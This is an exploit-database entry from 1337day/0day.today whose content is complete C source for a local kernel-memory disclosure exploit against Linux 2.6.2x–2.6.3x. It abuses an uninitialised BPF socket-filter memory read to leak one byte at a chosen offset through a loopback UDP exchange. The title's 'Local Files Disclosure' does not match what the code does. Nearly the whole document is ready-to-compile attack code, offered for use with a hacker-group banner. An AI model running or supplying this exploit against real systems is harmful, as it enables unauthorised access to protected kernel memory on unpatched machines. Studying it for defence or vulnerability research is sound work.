Linux Kernel 2.6.2* - 2.6.3* Local Files Disclosure

2011-10-02T00:00:00
ID 1337DAY-ID-17186
Type zdt
Reporter CrosS
Modified 2011-10-02T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


/*
 * Local File Disclosure 
 * Linux Kernel 2.6.2* - 2.6.3* 
 * By        > CrosS
 * Greetz    > r0073r , r4dc0re , Side^effects(1337day.com)
 *                       Ataman , S4(uR4 , Xenu(r00tw0rm.com) 
/
 
#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>
 
#define PORT 37337
 
int transfer(int sendsock, int recvsock)
{
 
    struct sockaddr_in addr;
    char buf[512];
    int len = sizeof(addr);
 
    memset(buf, 0, sizeof(buf));
     
    if (fork())
        return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
 
    sleep(1);
 
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
     
    sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
 
    exit(0);
 
}
 
int main(int argc, char * argv[])
{
 
    int sendsock, recvsock, ret;
    unsigned int val;  
    struct sockaddr_in addr;
    struct sock_fprog fprog;
    struct sock_filter filters[5];
 
    if (argc != 2) {
        printf("[*] Usage: %s offset (0-63)\n", argv[0]);
        return -1;
    }
 
    val = atoi(argv[1]);
 
    if (val > 63) {
        printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
        return -1;
    }
 
    recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 
    if (recvsock < 0 || sendsock < 0) {
        printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
        return -1;
    }
 
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
 
    if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("[*] CoulD no7 biNd soCke7.\n");
        return -1;
    }
 
    memset(&fprog, 0, sizeof(fprog));
    memset(filters, 0, sizeof(filters));
 
    filters[0].code = BPF_LD|BPF_MEM;
    filters[0].k = (val & ~0x3) / 4;
 
    filters[1].code = BPF_ALU|BPF_AND|BPF_K;
    filters[1].k = 0xff << ((val % 4) * 8);
 
    filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
    filters[2].k = (val % 4) * 8;
 
    filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
    filters[3].k = 256;
 
    filters[4].code = BPF_RET|BPF_A;
 
    fprog.len = 5;
    fprog.filter = filters;
 
    if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
        printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
        return -1;
    }
 
    ret = transfer(sendsock, recvsock);
 
    printf("[*] Your byte: 0x%.02x\n", ret - 248);
 
}



#  0day.today [2017-12-31]  #